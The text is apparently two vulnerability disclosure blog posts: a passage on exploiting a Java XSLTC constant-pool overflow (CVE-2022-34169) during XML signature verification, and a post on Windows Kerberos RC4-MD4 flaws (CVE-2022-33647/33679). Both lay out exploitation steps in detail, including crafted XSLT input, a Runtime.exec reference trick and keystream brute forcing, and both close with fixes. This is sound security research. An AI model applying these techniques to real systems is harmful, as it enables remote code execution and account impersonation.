XSLTC depends on the Apache Byte Code Engineering Library (BCEL) to dynamically create Java class files. As part of the compilation process, constants in the XSLT input such as Strings or Numbers get translated into Java constants, which are then stored in the constant pool. The following code snippet shows how an XSLT integer expression gets compiled: Small integers that fit into a byte or short are stored inline in bytecode using the bipush or sipush instructions. Larger ones are added to the constant pool using the cp.addInteger method:


// org/apache/xalan/xsltc/compiler/IntExpr.java

public void translate(ClassGenerator classGen, MethodGenerator methodGen) {

        ConstantPoolGen cpg = classGen.getConstantPool();

        InstructionList il = methodGen.getInstructionList();

        il.append(new PUSH(cpg, _value));

    }

// org/apache/bcel/internal/generic/PUSH.java

public PUSH(final ConstantPoolGen cp, final int value) {

        if ((value >= -1) && (value <= 5)) {

            instruction = InstructionConst.getInstruction(Const.ICONST_0 + value);

        } else if (Instruction.isValidByte(value)) {

            instruction = new BIPUSH((byte) value);

        } else if (Instruction.isValidShort(value)) {

            instruction = new SIPUSH((short) value);

        } else {

            instruction = new LDC(cp.addInteger(value));

        }

    }


The problem with this approach is that neither XSLTC nor BCEL correctly limits the size of the constant pool. As constant_pool_count, which describes the size of the constant pool, is only 2 bytes long, its maximum size is limited to 2**16 - 1 or 65535 entries. In practice even fewer entries are possible, because some constant types take up two entries. However, BCELs internal constant pool representation uses a standard Java Array for storing constants, and does not enforce any limits on its length.

When XSLTC processes a stylesheet that contains more constants, and BCELs internal class representation is serialized to a class file at the end of the compilation process the array length is truncated to a short, but the complete array is written out:

This means that constant_pool_count will now contain a small value and that parts of the attacker-controlled constant pool will get interpreted as the class fields following the constant pool, including method and attribute definitions. 

Exploiting a constant pool overflow


To understand how we can exploit this, we first need to take a closer look at the content of the constant pool.  Each entry in the pool starts with a 1-byte tag describing the kind of constant, followed by the actual data. The table below shows an incomplete list of constant types supported by the JVM (see the official documentation for a complete list). No need to read through all of them but we will come back to this table a lot when walking through the exploit. 

Constant Kind

Tag

Description

Layout

CONSTANT_Utf8

1

Constant variable-sized UTF-8 string value

CONSTANT_Utf8_info {

    u1 tag;

    u2 length;

    u1 bytes[length];

}


CONSTANT_Integer

3

4-byte integer

CONSTANT_Integer_info {

    u1 tag;

    u4 bytes;

}


CONSTANT_Float

4

4-byte float

CONSTANT_Float_info {

    u1 tag;

    u4 bytes;

}


CONSTANT_Long

5

8-byte long

CONSTANT_Long_info {

    u1 tag;

    u4 high_bytes;

    u4 low_bytes;

}


CONSTANT_Double

6

8-byte double

CONSTANT_Double_info {

    u1 tag;

    u4 high_bytes;

    u4 low_bytes;

}

CONSTANT_Class

7

Reference to a class. Links to a Utf8 constant describing the name.

CONSTANT_Class_info {

    u1 tag;

    u2 name_index;

}


CONSTANT_String

8

A JVM “String”. Links to a UTF8 constant. 

CONSTANT_String_info {

    u1 tag;

    u2 string_index;

}


CONSTANT_Fieldref

CONSTANT_Methodref

CONSTANT_InterfaceMethodref

9

10

11

Reference to a class field or method. Links to a Class constant 

CONSTANT_Fieldref_info {

    u1 tag;

    u2 class_index;

    u2 name_and_type_index;

}


CONSTANT_Methodref_info {

    u1 tag;

    u2 class_index;

    u2 name_and_type_index;

}


CONSTANT_InterfaceMethodref_info {

    u1 tag;

    u2 class_index;

    u2 name_and_type_index;

}


CONSTANT_NameAndType

12

Describes a field or method.

CONSTANT_NameAndType_info {

    u1 tag;

    u2 name_index;

    u2 descriptor_index;

}


CONSTANT_MethodHandle

15

Describes a method handle.

 

CONSTANT_MethodHandle_info {

    u1 tag;

    u1 reference_kind;

    u2 reference_index;

}


CONSTANT_MethodType

16

Describes a method type. Points to a UTF8 constant containing a method descriptor.

CONSTANT_MethodType_info {

    u1 tag;

    u2 descriptor_index;

}



A perfect constant type for exploiting CVE-2022-34169 would be dynamically sized containing fully attacker controlled content. Unfortunately, no such type exists. While CONSTANT_Utf8 is dynamically sized, its content isn’t a raw string representation but an encoding format JVM calls “modified UTF-8”. This encoding introduces some significant restrictions on the data stored and rules out null bytes, making it mostly useless for corrupting class fields. 


The next best thing we can get is a fixed size constant type with full control over the content. CONSTANT_Long seems like an obvious candidate, but XSLTC never creates attacker-controlled long constants during the compilation process. Instead we can use large floating numbers to create CONSTANT_Double entry with (almost) fully controlled content. This gives us a nice primitive where we can corrupt class fields behind the constant pool with a byte pattern like 0x06 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0x06 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0x06 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ.


Unfortunately, this primitive alone isn’t sufficient for crafting a useful class file due to the requirements of the fields right after the constant_pool:


    cp_info        constant_pool[constant_pool_count-1];

    u2             access_flags;

    u2             this_class;

    u2             super_class;


access_flags is a big endian mask of flags describing access permissions and properties of the class. 

While the JVM is happy to ignore unknown flag values, we need to avoid setting flags like ACC_INTERFACE (0x0200) or ACC_ABSTRACT (0x0400) that result in an unusable class. This means that we can’t use a CONSTANT_Double entry as our first out-of-bound constant as its tag byte of 0x06 will get interpreted as these flags.


this_class is an index into the constant pool and has to point to a CONSTANT_Class entry that describes the class defined with this file. Fortunately, neither the JVM nor XSLTC cares much about which class we pretend to be, so this value can point to almost any CONSTANT_Class entry that XSLTC ends up generating. (The only restriction is that it can’t be a part of a protected namespace like java.lang.)


super_class is another index to a CONSTANT_Class entry in the constant pool. While the JVM is happy with any class, XSLTC expects this to be a reference to the org.apache.xalan.xsltc.runtime.AbstractTranslet class, otherwise loading and initialization of the class file fails.


After a lot of trial and error I ended up with the following approach to meet these requirements:


CONST_STRING          CONST_DOUBLE

0x08 0x07 0x02  0x06 0xXX 0xXX 0x00 0x00 0x00 0x00 0xZZ 0xZZ

access_flags  this_class   super_class  ints_count  fields_count methods_count


  1. We craft a XSLT input that results in 0x10703 constants in the pool. This will result in a truncated pool size of 0x703 and the start of the constant at index 0x703 (due to 0 based indexing) will be interpreted as access_flags.

  2. During compilation of the input, we trigger the addition of a new string constant when the pool has 0x702 constants. This will first create a CONSTANT_Utf8 entry at index 0x702 and a CONSTANT_String entry at 0x703. The String entry will reference the preceding Utf8 constant so its value will be the tag byte 0x08 followed by the index 0x07 0x02. This results in an usable access_flags value of 0x0807. 

  3. Add a CONSTANT_Double entry at index 0x704. Its 0x06 tag byte will be interpreted as part of the this_class field. The following 2 bytes can then be used to control the value of the super_class field. By setting the next 4 bytes to 0x00, we create an empty interface and fields arrays, before setting the last two bytes to the number of methods we want to define. 


The only remaining requirement is that we need to add a CONSTANT_Class entry at index 0x206 of the constant pool, which is relatively straightforward. 


The snippet below shows part of the generated XSLT input that will overwrite the first header fields. After filling the constant pool with a large number of string constants for the attribute fields and values, the CONST_STRING entry for the `jEb` element ends up at index 0x703. The XSLT function call to the `ceiling` function then triggers the addition of a controlled CONST_DOUBLE entry at index 0x704:


<jse jsf='jsg' … jDL='jDM' jDN='jDO' jDP='jDQ' jDR='jDS' jDT='jDU' jDV='jDW' jDX='jDY' jDZ='jEa' /><jEb />


<xsl:value-of select='ceiling(0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008344026969402015)'/>


We constructed the initial header fields and are now in the interesting part of the class file definition: The methods table. This is where all methods of a class and their bytecode is defined. After XSLTC generates a Java class, the XSLT runtime will load the class and instantiate an object, so the easiest way to achieve arbitrary code execution is to create a malicious constructor. Let’s take a look at the methods table to see how we can define a working constructor:


ClassFile {

    [...]

    u2             methods_count;

    method_info    methods[methods_count];

    [...]

}

    

method_info {

    u2             access_flags;

    u2             name_index;

    u2             descriptor_index;

    u2             attributes_count;

    attribute_info attributes[attributes_count];

}


attribute_info {

    u2 attribute_name_index;

    u4 attribute_length;

    u1 info[attribute_length];

}



Code_attribute {

    u2 attribute_name_index;

    u4 attribute_length;

    u2 max_stack;

    u2 max_locals;

    u4 code_length;

    u1 code[code_length];

    u2 exception_table_length;

    {   u2 start_pc;

        u2 end_pc;

        u2 handler_pc;

        u2 catch_type;

    } exception_table[exception_table_length];

    u2 attributes_count;

    attribute_info attributes[attributes_count];

}



The methods table is a dynamically sized array of method_info structs. Each of these structs describes the access_flags of the method, an index into the constant table that points to its name (as a utf8 constant), and another index pointing to the method descriptor (another CONSTANT_Utf8). 

This is followed by the attributes table, a dynamically sized map from Utf8 keys stored in the constant table to dynamically sized values stored inline. Fortunately, the only attribute we need to provide is the Code attribute, which contains the actual bytecode of the method. 



Going back to our payload, we can see that the start of the methods table is aligned with the tag byte of the next entry in the constant pool table. This means that the 0x06 tag of a CONSTANT_Double will clobber the access_flag field of the first method, making it unusable for us. Instead we have to create two methods: The first one as a basic filler to get the alignment right, and the second one as the actual constructor. Fortunately, the JVM ignores unknown attributes, so we can use dynamically sized attribute values. The graphic below shows how we use a series of CONST_DOUBLE entries to create a constructor method with an almost fully controlled body.


CONST_DOUBLE: 0x06 0x01 0xXX 0xXX 0xYY 0xYY 0x00 0x01 0xZZ

CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x05 0x00 0x00 0x00 0x00

CONST_DOUBLE: 0x06 0x00 0x01 0xCC 0xCC 0xDD 0xDD 0x00 0x03

CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x00 0x04 0x00 0x00 0x00

CONST_DOUBLE: 0x06 0xCC 0xDD 0xZZ 0xZZ 0xZZ 0xZZ 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA


First Method Header

access_flags 0x0601 

name_index  0xXXXX

desc_index 0xYYYY  

attr_count 0x0001

Attribute [0]

name_index 0xZZ06

length 0x00000005

data   “\x00\x00\x00\x00\x06”


Second Method Header

access_flags 0x0001

name_index  0xCCCC -> <init>

desc_index 0xDDDD  -> ()V

attr_count 0x0003 


Attribute [0]

name_index 0x0600

length 0x00000004

data   “\x00\x00\x00\x06

Attribute [1]

name_index 0xCCDD -> Code

length 0xZZZZZZZZ

data  PAYLOAD

Attribute [2] ...



We still need to bypass one limitation: JVM bytecode does not work standalone, but references and relies on entries in the constant pool. Instantiating a class or calling a method requires a corresponding constant entry in the pool. This is a problem as our bug doesn’t give us the ability to create fake constant pool entries so we are limited to constants that XSLTC adds during compilation.


Luckily, there is a way to add arbitrary class and method references to the constant pool: Java’s XSLT runtime supports calling arbitrary Java methods. As this is clearly insecure, this functionality is protected by a runtime setting and always disabled during signature verification.

However, XSLTC will still process and compile these function calls when processing a stylesheet and the call will only be blocked during runtime (see the corresponding code in FunctionCall.java). This means that we can get references to all required methods and classes by adding a XSLT element like the one shown below:


<xsl:value-of select="rt:exec(rt:getRuntime(),'...')" xmlns:rt="java.lang.Runtime"/>



There are two final checks we need to bypass, before we end up with a working class file:

  • The JVM enforces that every constructor of a subclass, calls a superclass constructor before returning. This check can be bypassed by never returning from our constructor either by adding an endless loop at the end or throwing an exception, which is the approach I used in my exploit Proof-of-Concept. A slightly more complex, but cleaner approach is to add a reference to the AbstractTranslet constructor to the object pool and call it. This is the approach used by thanat0s in their exploit writeup.

  • Finally, we need to skip over the rest of XSLTC’s output. This can be done by constructing a single large attribute with the right size as an element in the class attribute table.



Once we chain all of this together we end up with a signed XML document that can trigger the execution of arbitrary JVM bytecode during signature verification. I’ve skipped over some implementation details of this exploit, so if you want to reproduce this vulnerability please take a look at the heavily commented  proof-of-concept script.


Impact and Restrictions

In theory every unpatched Java application that processes XML signatures is vulnerable to this exploit. However, there are two important restrictions:


As references are only processed after the signature of the SignedInfo element is verified, applications can be protected based on their usage of the KeySelector class. Applications that use a allowlist of trusted keys in their KeySelector will be protected as long as these keys are not compromised. An example of this would be a single-tenant SAML SP configured with a single trusted IdP key. In practice, a lot of these applications are still vulnerable as they don’t use KeySelector directly and will instead enforce this restriction in their own application logic after an unrestricted signature validation. At this point the vulnerability has already been triggered. Multi-tenant SAML applications that support customer-provided Identity Providers, as most modern cloud SaaS do, are also not protected by this limitation.

SAML Identity Providers can only be attacked if they support (and verify) signed SAML requests.


Even without CVE-2022-34169, processing XSLT during signature verification can be easily abused as part of a DoS attack. For this reason, the property org.jcp.xml.dsig.secureValidation can be enabled to forbid XSLT transformation in XML signatures. Interestingly this property defaults to false for all JDK versions <17, if the application is not running under the Java security manager. As the Security Manager is rarely used for server side applications and JDK 17 was only released a year ago, we expect that a lot of applications are not protected by this. Limited testing of large java-based SSO providers confirmed this assumption. Another reason for a lack of widespread usage might be that org.jcp.xml.dsig.secureValidation also disables use of the SHA1 algorithm in newer JDK versions. As SHA1 is still widely used by enterprise customers, simply enabling the property without manually configuring a suitable jdk.xml.dsig.secureValidationPolicy might not be feasible.

Conclusion

XML signatures in general and SAML in particular offer a large and complex attack surface to external attackers. Even though Java offers configuration options that can be used to address this vulnerability, they are complex, might break real-world use cases and are off by default. 


Developers that rely on SAML should make sure they understand the risks associated with it and should reduce the attack surface as much as possible by disabling functionality that is not required for their use case. Additional defense-in-depth approaches like early validation of signing keys, an allow-list based approach to valid transformation chains and strict schema validation of SAML tickets can be used for further hardening.


RC4 Is Still Considered Harmful

By: Tim
27 October 2022 at 19:48

By James Forshaw, Project Zero


I've been spending a lot of time researching Windows authentication implementations, specifically Kerberos. In June 2022 I found an interesting issue number 2310 with the handling of RC4 encryption that allowed you to authenticate as another user if you could either interpose on the Kerberos network traffic to and from the KDC or directly if the user was configured to disable typical pre-authentication requirements.


This blog post goes into more detail on how this vulnerability works and how I was able to exploit it with only a bare minimum of brute forcing required. Note, I'm not going to spend time fully explaining how Kerberos authentication works, there's plenty of resources online. For example this blog post by Steve Syfuhs who works at Microsoft is a good first start.

Background

Kerberos is a very old authentication protocol. The current version (v5) was described in RFC1510 back in 1993, although it was updated in RFC4120 in 2005. As Kerberos' core security concept is using encryption to prove knowledge of a user's credentials the design allows for negotiating the encryption and checksum algorithms that the client and server will use. 


For example when sending the initial authentication service request (AS-REQ) to the Key Distribution Center (KDC) a client can specify a list supported encryption algorithms, as predefined integer identifiers, as shown below in the snippet of the ASN.1 definition from RFC4120.


KDC-REQ-BODY    ::= SEQUENCE {

...

    etype    [8] SEQUENCE OF Int32 -- EncryptionType

                                   -- in preference order --,

...

}


When the server receives the request it checks its list of supported encryption types and the ones the user's account supports (which is based on what keys the user has configured) and then will typically choose the one the client most preferred. The selected algorithm is then used for anything requiring encryption, such as generating session keys or the EncryptedData structure as shown below:


EncryptedData   ::= SEQUENCE {

        etype   [0] Int32 -- EncryptionType --,

        kvno    [1] UInt32 OPTIONAL,

        cipher  [2] OCTET STRING -- ciphertext

}


The KDC will send back an authentication service reply (AS-REP) structure containing the user's Ticket Granting Ticket (TGT) and an EncryptedData structure which contains the session key necessary to use the TGT to request service tickets. The user can then use their known key which corresponds to the requested encryption algorithm to decrypt the session key and complete the authentication process.


Alt Text: Diagram showing the based Kerberos authentication and requesting an AES key type.

This flexibility in selecting an encryption algorithm is both a blessing and a curse. In the original implementations of Kerberos only DES encryption was supported, which by modern standards is far too weak. Because of the flexibility developers were able to add support for AES through RFC3962 which is supported by all modern versions of Windows. This can then be negotiated between client and server to use the best algorithm both support. However, unless weak algorithms are explicitly disabled there's nothing stopping a malicious client or server from downgrading the encryption algorithm in use and trying to break Kerberos using cryptographic attacks.


Modern versions of Windows have started to disable DES as a supported encryption algorithm, preferring AES. However, there's another encryption algorithm which Windows supports which is still enabled by default, RC4. This algorithm was used in Kerberos by Microsoft for Windows 2000, although its documentation was in draft form until RFC4757 was released in 2006. 


The RC4 stream cipher has many substantial weaknesses, but when it was introduced it was still considered a better option than DES which has been shown to be sufficiently vulnerable to hardware cracking such as the EFF's "Deep Crack". Using RC4 also had the advantage that it was relatively easy to operate in a reduced key size mode to satisfy US export requirements of cryptographic systems. 


If you read the RFC for the implementation of RC4 in Kerberos, you'll notice it doesn't use the stream cipher as is. Instead it puts in place various protections to guard against common cryptographic attacks:

  • The encrypted data is protected by a keyed MD5 HMAC hash to prevent tampering which is trivial with a simple stream cipher such as RC4. The hashed data includes a randomly generated 8-byte "confounder" so that the hash is randomized even for the same plain text.

  • The key used for the encryption is derived from the hash and a base key. This, combined with the confounder makes it almost certain the same key is never reused for the encryption.

  • The base key is not the user's key, but instead is derived from a MD5 HMAC keyed with the user's key over a 4 byte message type value. For example the message type is different for the AS-REQ and the AS-REP structures. This prevents an attacker using Kerberos as an encryption oracle and reusing existing encrypted data in unrelated parts of the protocol.


Many of the known weaknesses of RC4 are related to gathering a significant quantity of ciphertext encrypted with a known key. Due to the design of the RC4-HMAC algorithm and the general functional principles of Kerberos this is not really a significant concern. However, the biggest weakness of RC4 as defined by Microsoft for Kerberos is not so much the algorithm, but the generation of the user's key from their password. 


As already mentioned Kerberos was introduced in Windows 2000 to replace the existing NTLM authentication process used from NT 3.1. However, there was a problem of migrating existing users to the new authentication protocol. In general the KDC doesn't store a user's password, instead it stores a hashed form of that password. For NTLM this hash was generated from the Unicode password using a single pass of the MD4 algorithm. Therefore to make an easy upgrade path Microsoft specified that the RC4-HMAC Kerberos key was this same hash value.


As the MD4 output is 16 bytes in size it wouldn't be practical to brute force the entire key. However, the hash algorithm has no protections against brute-force attacks for example no salting or multiple iterations. If an attacker has access to ciphertext encrypted using the RC4-HMAC key they can attempt to brute force the key through guessing the password. As user's will tend to choose weak or trivial passwords this increases the chance that a brute force attack would work to recover the key. And with the key the attacker can then authenticate as that user to any service they like. 


To get appropriate cipher text the attacker can make requests to the KDC and specify the encryption type they need. The most well known attack technique is called Kerberoasting. This technique requests a service ticket for the targeted user and specifies the RC4-HMAC encryption type as their preferred algorithm. If the user has an RC4 key configured then the ticket returned can be encrypted using the RC4-HMAC algorithm. As significant parts of the plain-text is known for the ticket data the attacker can try to brute force the key from that. 


This technique does require the attacker to have an account on the KDC to make the service ticket request. It also requires that the user account has a configured Service Principal Name (SPN) so that a ticket can be requested. Also modern versions of Windows Server will try to block this attack by forcing the use of AES keys which are derived from the service user's password over RC4 even if the attacker only requested RC4 support.


An alternative form is called AS-REP Roasting. Instead of requesting a service ticket this relies on the initial authentication requests to return encrypted data. When a user sends an AS-REQ structure, the KDC can look up the user, generate the TGT and its associated session key then return that information encrypted using the user's RC4-HMAC key. At this point the KDC hasn't verified the client knows the user's key before returning the encrypted data, which allows the attacker to brute force the key without needing to have an account themselves on the KDC.


Fortunately this attack is more rare because Windows's Kerberos implementation requires pre-authentication. For a password based logon the user uses their encryption key to encrypt a timestamp value which is sent to the KDC as part of the AS-REQ. The KDC can decrypt the timestamp, check it's within a small time window and only then return the user's TGT and encrypted session key. This would prevent an attacker getting encrypted data for the brute force attack. 


However, Windows does support a user account flag, "Do not require Kerberos preauthentication". If this flag is enabled on a user the authentication request does not require the encrypted timestamp to be sent and the AS-REP roasting process can continue. This should be an uncommon configuration.


The success of the brute-force attack entirely depends on the password complexity. Typically service user accounts have a long, at least 25 character, randomly generated password which is all but impossible to brute force. Normal users would typically have weaker passwords, but they are less likely to have a configured SPN which would make them targets for Kerberoasting. The system administrator can also mitigate the attack by disabling RC4 entirely across the network, though this is not commonly done for compatibility reasons. A more limited alternative is to add sensitive users to the Protected Users Group, which disables RC4 for them without having to disable it across the entire network.

Windows Kerberos Encryption Implementation

While working on researching Windows Defender Credential Guard (CG) I wanted to understand how Windows actually implements the various Kerberos encryption schemes. The primary goal of CG at least for Kerberos is to protect the user's keys, specifically the ones derived from their password and session keys for the TGT. If I could find a way of using one of the keys with a weak encryption algorithm I hoped to be able to extract the original key removing CG's protection.


The encryption algorithms are all implemented inside the CRYPTDLL.DLL library which is separate from the core Kerberos library in KERBEROS.DLL on the client and KDCSVC.DLL on the server. This interface is undocumented but it's fairly easy to work out how to call the exported functions. For example, to get a "crypto system" from the encryption type integer you can use the following exported function:


NTSTATUS CDLocateCSystem(int etype, KERB_ECRYPT** engine);


The KERB_ECRYPT structure contains configuration information for the engine such as the size of the key and function pointers to convert a password to a key, generate new session keys, and perform encryption or decryption. The structure also contains a textual name so that you can get a quick idea of what algorithm is supposed to be, which lead to the following supported systems:


Name                                    Encryption Type

----                                    ---------------

RSADSI RC4-HMAC                         24

RSADSI RC4-HMAC                         23

Kerberos AES256-CTS-HMAC-SHA1-96        18

Kerberos AES128-CTS-HMAC-SHA1-96        17

Kerberos DES-CBC-MD5                    3

Kerberos DES-CBC-CRC                    1

RSADSI RC4-MD4                          -128

Kerberos DES-Plain                      -132

RSADSI RC4-HMAC                         -133

RSADSI RC4                              -134

RSADSI RC4-HMAC                         -135

RSADSI RC4-EXP                          -136

RSADSI RC4                              -140

RSADSI RC4-EXP                          -141

Kerberos AES128-CTS-HMAC-SHA1-96-PLAIN  -148

Kerberos AES256-CTS-HMAC-SHA1-96-PLAIN  -149


Encryption types with positive values are well-known encryption types defined in the RFCs, whereas negative values are private types. Therefore I decided to spend my time on these private types. Most of the private types were just subtle variations on the existing well-known types, or clones with legacy numbers. 


However, one stood out as being different from the rest, "RSADSI RC4-MD4" with type value -128. This was different because the implementation was incredibly insecure, specifically it had the following properties:


  • Keys are 16 bytes in size, but only the first 8 of the key bytes are used by the encryption algorithm.

  • The key is used as-is, there's no blinding so the key stream is always the same for the same user key.

  • The message type is ignored, which means that the key stream is the same for different parts of the Kerberos protocol when using the same key.

  • The encrypted data does not contain any cryptographic hash to protect from tampering with the ciphertext which for RC4 is basically catastrophic. Even though the name contains MD4 this is only used for deriving the key from the password, not for any message integrity.

  • Generated session keys are 16 bytes in size but only contain 40 bits (5 bytes) of randomness. The remaining 11 bytes are populated with the fixed value of 0xAB.


To say this is bad from a cryptographic standpoint, is an understatement. Fortunately it would be safe to assume that while this crypto system is implemented in CRYPTDLL, it wouldn't be used by Kerberos? Unfortunately not — it is totally accepted as a valid encryption type when sent in the AS-REQ to the KDC. The question then becomes how to exploit this behavior?

Exploitation on the Wire (CVE-2022-33647)

My first thoughts were to attack the session key generation. If we could get the server to return the AS-REP with a RC4-MD4 session key for the TGT then any subsequent usage of that key could be captured and used to brute force the 40 bit key. At that point we could take the user's TGT which is sent in the clear and the session key and make requests as that authenticated user.


The most obvious approach to forcing the preferred encryption type to be RC4-MD4 would be to interpose the connection between a client and the KDC. The etype field of the AS-REQ is not protected for password based authentication. Therefore a proxy can modify the field to only include RC4-MD4 which is then sent to the KDC. Once that's completed the proxy would need to also capture a service ticket request to get encrypted data to brute force.


Brute forcing the 40 bit key would be technically feasible at least if you built a giant lookup table, however I felt like it's not practical. I realized there's a simpler way, when a client authenticates it typically sends a request to the KDC with no pre-authentication timestamp present. As long as pre-authentication hasn't been disabled the KDC returns a Kerberos error to the client with the KDC_ERR_PREAUTH_REQUIRED error code. 


As part of that error response the KDC also sends a list of acceptable encryption types in the PA-ETYPE-INFO2 pre-authentication data structure. This list contains additional information for the password to key derivation such as the salt for AES keys. The client can use this information to correctly generate the encryption key for the user. I noticed that if you sent back only a single entry indicating support for RC4-MD4 then the client would use the insecure algorithm for generating the pre-authentication timestamp. This worked even if the client didn't request RC4-MD4 in the first place.


When the KDC received the timestamp it would validate it using the RC4-MD4 algorithm and return the AS-REP with the TGT's RC4-MD4 session key encrypted using the same key as the timestamp. Due to the already mentioned weaknesses in the RC4-MD4 algorithm the key stream used for the timestamp must be the same as used in the response to encrypt the session key. Therefore we could mount a known-plaintext attack to recover the keystream from the timestamp and use that to decrypt parts of the response.


Diagram showing the attack process. A computer with a kerberos client sends an AS-REQ to the attacker, which returns an error requesting pre-authentication and selecting RC4-MD4 encryption. The client then converts the user's password into an RC4-MD4 key which is used to encrypt the timestamp to send to the KDC. This is used to validate the user authentication and an AS-REP is returned with a TGT session key generated for RC4-MD4.

The timestamp itself has the following ASN.1 structure, which is serialized using the Distinguished Encoding Rules (DER) and then encrypted.


PA-ENC-TS-ENC           ::= SEQUENCE {

     patimestamp     [0] KerberosTime -- client's time --,

     pausec          [1] Microseconds OPTIONAL

}


The AS-REP encrypted response has the following ASN.1 structure:


EncASRepPart  ::= SEQUENCE {

     key             [0] EncryptionKey,

     last-req        [1] LastReq,

     nonce           [2] UInt32,

     key-expiration  [3] KerberosTime OPTIONAL,

     flags           [4] TicketFlags,

     authtime        [5] KerberosTime,

     starttime       [6] KerberosTime OPTIONAL,

     endtime         [7] KerberosTime,

     renew-till      [8] KerberosTime OPTIONAL,

     srealm          [9] Realm,

     sname           [10] PrincipalName,

     caddr           [11] HostAddresses OPTIONAL

}


We can see from the two structures that as luck would have it the session key in the AS-REP is at the start of the encrypted data. This means there should be an overlap between the known parts of the timestamp and the key, allowing us to apply key stream recovery to decrypt the session key without any brute force needed.


Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between known bytes in the timestamp with the 40 bit session key in the AS-REP.

The diagram shows the ASN.1 DER structures for the timestamp and the start of the AS-REP. The values with specific hex digits in green are plain-text we know or can calculate as they are part of the ASN.1 structure such as types and lengths. We can see that there's a clear overlap between 4 bytes of known data in the timestamp with the first 4 bytes of the session key. We only need the first 5 bytes of the key due to the padding at the end, but this does mean we need to brute force the final key byte. 


We can do this brute force one of two ways. First we can send service ticket requests with the user's TGT and a guess for the session key to the KDC until one succeeds. This would require at most 256 requests to the KDC. Alternatively we can capture a service ticket request from the client which is likely to happen immediately after the authentication. As the service ticket request will be encrypted using the session key we can perform the brute force attack locally without needing to talk to the KDC which will be faster. Regardless of the option chosen this approach would be orders of magnitude faster than brute forcing the entire 40 bit session key.


The simplest approach to performing this exploit would be to interpose the client to server connection and modify traffic. However, as the initial request without pre-authentication just returns an error message it's likely the exploit could be done by injecting a response back to the client while the KDC is processing the real request. This could be done with only the ability to monitor network traffic and inject arbitrary network traffic back into that network. However, I've not verified that approach.

Exploitation without Interception (CVE-2022-33679)

The requirement to have access to the client to server authentication traffic does make this vulnerability seem less impactful. Although there's plenty of scenarios where an attacker could interpose, such as shared wifi networks, or physical attacks which could be used to compromise the computer account authentication which would take place when a domain joined system was booted.


It would be interesting if there was an attack vector to exploit this without needing a real Kerberos user at all. I realized that if a user has pre-authentication disabled then we have everything we need to perform the attack. The important point is that if pre-authentication is disabled we can request a TGT for the user, specifying RC4-MD4 encryption and the KDC will send back the AS-REP encrypted using that algorithm.


The key to the exploit is to reverse the previous attack, instead of using the timestamp to decrypt the AS-REP we'll use the AS-REP to encrypt a timestamp. We can then use the timestamp value when sent to the KDC as an encryption oracle to brute force enough bytes of the key stream to decrypt the TGT's session key. For example, if we remove the optional microseconds component of the timestamp we get the following DER encoded values:


Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between known bytes in the AS-REP and the timestamp string which can be used to generate a valid encrypted timestamp.

The diagram shows that currently there's no overlap between the timestamp, represented by the T bytes, and the 40 bit session key. However, we know or at least can calculate the entire DER encoded data for the AS-REP to cover the entire timestamp buffer. We can use this to calculate the keystream for the user's RC4-MD4 key without actually knowing the key itself. With the key stream we can encrypt a valid timestamp and send it to the KDC. 


If the KDC responds with a valid AS-REP then we know we've correctly calculated the key stream. How can we use this to start decrypting the session key? The KerberosTime value used for the timestamp is an ASCII string of the form YYYYMMDDHHmmssZ. The KDC parses this string to a format suitable for processing by the server. The parser takes the time as a NUL terminated string, so we can add an additional NUL character to the end of the string and it shouldn't affect the parsing. Therefore we can change the timestamp to the following:



Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between a final NUL character at the end of the timestamp string which overlaps with the first byte of the 40 bit session key.


We can now guess a value for the encrypted NUL character and send the new timestamp to the KDC. If the KDC returns an error we know that the parsing failed as it didn't decrypt to a NUL character. However, if the authentication succeeds the value we guessed is the next byte in the key stream and we can decrypt the first byte of the session key.


At this point we've got a problem, we can't just add another NUL character as the parser would stop on the first one we sent. Even if the value didn't decrypt to a NUL it wouldn't be possible to detect. This is when a second trick comes into play, instead of extending the string we can abuse the way value lengths are encoded in DER. A length can be in one of two forms, a short form if the length is less than 128, or a long form for everything else. 


For the short form the length is encoded in a single byte. For the long form, the first byte has the top bit set to 1, and the lower 7 bits encode the number of trailing bytes of the length value in big-endian format. For example in the above diagram the timestamp's total size is 0x14 bytes which is stored in the short form. We can instead encode the length in an arbitrary sized long form, for example 0x81 0x14, 0x82 0x00 0x14, 0x83 0x00 0x00 0x14 etc. The examples shown below move the NUL character to brute force the next two bytes of the session key:



Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows extending the first length field so there is an overlap between a final NUL character at the end of the timestamp string which overlaps with the second and third bytes of the 40 bit session key.

Even though technically DER should expect the shortest form necessary to encode the length the Microsoft ASN.1 library doesn't enforce that when parsing so we can just repeat this length encoding trick to cover the remaining 4 unknown bytes of the key. As the exploit brute forces one byte at a time the maximum number of requests that we'd need to send to the KDC is 5 × 28 which is 1280 requests as opposed to 240 requests which would be around 1 trillion. 


Even with such a small number of requests it can still take around 30 seconds to brute force the key, but that still makes it a practical attack. Although it would be very noisy on the network and you'd expect any competent EDR system to notice, it might be too late at that point.

The Fixes

The only fix I can find is in the KDC service for the domain controller. Microsoft has added a new flag which by default disables the RC4-MD4 algorithm and an old variant of RC4-HMAC with the encryption type of -133. This behavior can be re-enabled by setting the KDC configuration registry value AllowOldNt4Crypto. The reference to NT4 is a good indication on how long this vulnerability has existed as it presumably pre-dates the introduction of Kerberos in Windows 2000. There are probably some changes to the client as well, but I couldn't immediately find them and it's not really worth my time to reverse engineer it.


